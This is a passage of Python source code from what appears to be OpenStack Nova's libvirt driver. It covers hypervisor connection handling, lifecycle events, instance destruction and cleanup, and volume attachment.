tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 11)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_DEVICE_CALLBACK_VERSION = (1, 1, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
# TODO(sdague): this should be 1.0.0, but hacked to set 1.3.0 until
# https://bugs.launchpad.net/nova/+bug/1334398
# can be diagnosed & resolved
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 3, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
# block size tuning requirements
MIN_LIBVIRT_BLOCKIO_VERSION = (0, 10, 2)
# BlockJobInfo management requirement
MIN_LIBVIRT_BLOCKJOBINFO_VERSION = (1, 1, 1)
# Relative block commit (feature is detected,
# this version is only used for messaging)
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION = (1, 2, 7)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._skip_list_all_domains = False
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
self.vif_driver = libvirt_vif.LibvirtGenericVIFDriver(
self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt.volume_drivers, self)
self.dev_filter = pci_whitelist.get_pci_devices_filter()
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"unsafe",
]
self._conn_supports_start_paused = CONF.libvirt.virt_type in ('kvm',
'qemu')
for mode_str in CONF.libvirt.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_LW('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
self._volume_api = volume.API()
self._image_api = image.API()
sysinfo_serial_funcs = {
'none': lambda: None,
'hardware': self._get_host_sysinfo_serial_hardware,
'os': self._get_host_sysinfo_serial_os,
'auto': self._get_host_sysinfo_serial_auto,
}
self._sysinfo_serial_func = sysinfo_serial_funcs.get(
CONF.libvirt.sysinfo_serial)
if not self._sysinfo_serial_func:
raise exception.NovaException(
_("Unexpected sysinfo_serial setting '%(actual)s'. "
"Permitted values are %(expect)s'") %
{'actual': CONF.libvirt.sysinfo_serial,
'expect': ', '.join("'%s'" % k for k in
sysinfo_serial_funcs.keys())})
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def _set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
@staticmethod
def _conn_has_min_version(conn, lv_ver=None, hv_ver=None, hv_type=None):
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if libvirt_version < utils.convert_version_to_int(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if hypervisor_version < utils.convert_version_to_int(hv_ver):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._conn_has_min_version(self._conn, lv_ver, hv_ver, hv_type)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
self.emit_event(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = last_close_event['reason']
_error = _("Connection to libvirt lost: %s") % reason
LOG.warn(_error)
self._wrapped_conn = None
# Disable compute service to avoid
# new instances of being scheduled on this host.
self._set_host_enabled(False, disable_reason=_error)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _do_quality_warnings(self):
"""Warn about untested driver configurations.
This will log a warning message about untested driver or host arch
configurations to indicate to administrators that the quality is
unknown. Currently, only qemu or kvm on intel 32- or 64-bit systems
is tested upstream.
"""
caps = self._get_host_capabilities()
arch = caps.host.cpu.arch
if (CONF.libvirt.virt_type not in ('qemu', 'kvm') or
arch not in ('i686', 'x86_64')):
LOG.warn(_LW('The libvirt driver is not tested on '
'%(type)s/%(arch)s by the OpenStack project and '
'thus its quality can not be ensured. For more '
'information, see: https://wiki.openstack.org/wiki/'
'HypervisorSupportMatrix'),
{'type': CONF.libvirt.virt_type, 'arch': arch})
def init_host(self, host):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._do_quality_warnings()
# Stop libguestfs using KVM unless we're also configured
# to use this. This solves problem where people need to
# stop Nova use of KVM because nested-virt is broken
if CONF.libvirt.virt_type != "kvm":
guestfs.force_tcg()
if not self._has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_LE('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
self._init_events()
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self.uri())
wrapped_conn = None
try:
wrapped_conn = self._connect(self.uri(), self.read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = DISABLE_REASON_UNDEFINED
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
self._set_host_enabled(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
self._skip_list_all_domains = False
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self.uri(), 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self.uri(), 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
_conn = property(_get_connection)
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def uri():
if CONF.libvirt.virt_type == 'uml':
uri = CONF.libvirt.connection_uri or 'uml:///system'
elif CONF.libvirt.virt_type == 'xen':
uri = CONF.libvirt.connection_uri or 'xen:///'
elif CONF.libvirt.virt_type == 'lxc':
uri = CONF.libvirt.connection_uri or 'lxc:///'
else:
uri = CONF.libvirt.connection_uri or 'qemu:///system'
return uri
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
LibvirtDriver._connect_auth_cb,
None]
try:
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
def instance_exists(self, instance):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance.name)
return True
except exception.NovaException:
return False
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self._conn.listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self._conn.numOfDomains() > 0:
for id in self._conn.listDomainsID():
try:
dom = self._lookup_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self._conn.listDefinedDomains():
try:
dom = self._lookup_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def _list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def list_instances(self):
names = []
for dom in self._list_instance_domains(only_running=False):
names.append(dom.name())
return names
def list_instance_uuids(self):
uuids = []
for dom in self._list_instance_domains(only_running=False):
uuids.append(dom.UUIDString())
return uuids
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for vif in network_info:
self.vif_driver.plug(instance, vif)
def _unplug_vifs(self, instance, network_info, ignore_errors):
"""Unplug VIFs from networks."""
for vif in network_info:
try:
self.vif_driver.unplug(instance, vif)
except exception.NovaException:
if not ignore_errors:
raise
def unplug_vifs(self, instance, network_info):
self._unplug_vifs(instance, network_info, False)
def _teardown_container(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
rootfs_dev = instance.system_metadata.get('rootfs_device_name')
disk.teardown_container(container_dir, rootfs_dev)
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
# NOTE(GuanQiang): teardown container to avoid resource leak
if CONF.libvirt.virt_type == 'lxc':
self._teardown_container(instance)
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_LW("Cannot destroy instance, operation time "
"out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.InstanceNotFound:
LOG.warning(_LW("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_LI("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be a endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_LI("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_LI("Going to destroy instance again."),
instance=instance)
self._destroy(instance)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._destroy(instance)
self.cleanup(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags."
" Retrying with undefine", instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_LE('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e}, instance=instance)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
self._undefine_domain(instance)
if destroy_vifs:
self._unplug_vifs(instance, network_info, True)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_LW("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.exception(_LE('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, such as the
# the soft reboot operation boot it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
if ('data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
try:
self._disconnect_volume(connection_info, disk_dev)
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if destroy_disks:
# Don't block on Volume errors if we're trying to
# delete the instance as we may be partially created
# or deleted
ctxt.reraise = False
LOG.warn(_LW("Ignoring Volume Error on vol %(vol_id)s "
"during delete %(exc)s"),
{'vol_id': vol.get('volume_id'), 'exc': exc},
instance=instance)
if destroy_disks or (
migrate_data and migrate_data.get('is_shared_block_storage',
False)):
self._delete_instance_files(instance)
if destroy_disks:
self._cleanup_lvm(instance)
# NOTE(haomai): destroy volumes if needed
if CONF.libvirt.images_type == 'rbd':
self._cleanup_rbd(instance)
@staticmethod
def _get_rbd_driver():
return rbd_utils.RBDDriver(
pool=CONF.libvirt.images_rbd_pool,
ceph_conf=CONF.libvirt.images_rbd_ceph_conf,
rbd_user=CONF.libvirt.rbd_user)
def _cleanup_rbd(self, instance):
LibvirtDriver._get_rbd_driver().cleanup_volumes(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
lvm.remove_volumes(disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt.images_volume_group:
vg = os.path.join('/dev', CONF.libvirt.images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['uuid']
# TODO(sdague): remove in Juno
def belongs_to_instance_legacy(disk):
# We don't want to leak old disks, but at the same time, we
# don't want to do an unsafe thing. So we will only handle
# the old filter if it's the system default still.
pattern = '%s_' % instance['name']
if disk.startswith(pattern):
if CONF.instance_name_template == 'instance-%08x':
return True
else:
LOG.warn(_LW('Volume %(disk)s possibly unsafe to '
'remove, please clean up manually'),
{'disk': disk})
return False
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = lvm.list_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
# TODO(sdague): remove in Juno
disk_names.extend(
filter(belongs_to_instance_legacy, logical_volumes)
)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug('Could not determine iscsi initiator name',
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide node names',
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide port names',
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
# NOTE(wangpan): we get the pre-grizzly instance path firstly,
# so the backup dir of pre-grizzly instance can
# be deleted correctly with grizzly or later nova.
pre_grizzly_name = libvirt_utils.get_instance_path(instance,
forceold=True)
target = pre_grizzly_name + '_resize'
if not os.path.exists(target):
target = libvirt_utils.get_instance_path(instance) + '_resize'
if os.path.exists(target):
# Deletion can fail over NFS, so retry the deletion as required.
# Set maximum attempt as 5, most test can remove the directory
# for the second time.
utils.execute('rm', '-rf', target, delay_on_retry=True,
attempts=5)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def _connect_volume(self, connection_info, disk_info):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.connect_volume(connection_info, disk_info)
def _disconnect_volume(self, connection_info, disk_dev):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.disconnect_volume(connection_info, disk_dev)
def _get_volume_encryptor(self, connection_info, encryption):
encryptor = encryptors.get_volume_encryptor(connection_info,
**encryption)
return encryptor
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
bdm = {
'device_name': disk_dev,
'disk_bus': disk_bus,
'device_type': device_type}
# Note(cfb): If the volume has a custom block size, check that
# that we are using QEMU/KVM and libvirt >= 0.10.2. The
# presence of a block size is considered mandatory by
# cinder so we fail if we can't honor the request.
data = {}
if ('data' in connection_info):
data = connection_info['data']
if ('logical_block_size' in data or 'physical_block_size' in data):
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Volume sets block size, but the current "
"libvirt hypervisor '%s' does not support custom "
"block size") % CONF.libvirt.virt_type
raise exception.InvalidHypervisorType(msg)
if not self._has_min_version(MIN_LIBVIRT_BLOCKIO_VERSION):
ver = ".".join([str(x) for x in MIN_LIBVIRT_BLOCKIO_VERSION])
msg = _("Volume sets block size, but libvirt '%s' or later is "
"required.") % ver
raise exception.Invalid(msg)
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt.virt_type, bdm)
conf = self._connect_volume(connection_info, disk_info)
self._set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self._disconnect_volume(connection_info, disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self._disconnect_volume(connection_info, disk_dev)
def _swap_volume(self, domain, disk_path, new_path, resize_to):
"""Swap existing disk with a new block device."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# Start copy with VIR_DOMAIN_REBASE_REUSE_EXT flag to
# allow writing to existing external volume file
domain.blockRebase(disk_path, new_path, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path,
libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT)
if resize_to:
# NOTE(alex_xu): domain.blockJobAbort isn't sync call. This
# is bug in libvirt. So we need waiting for the pivot is
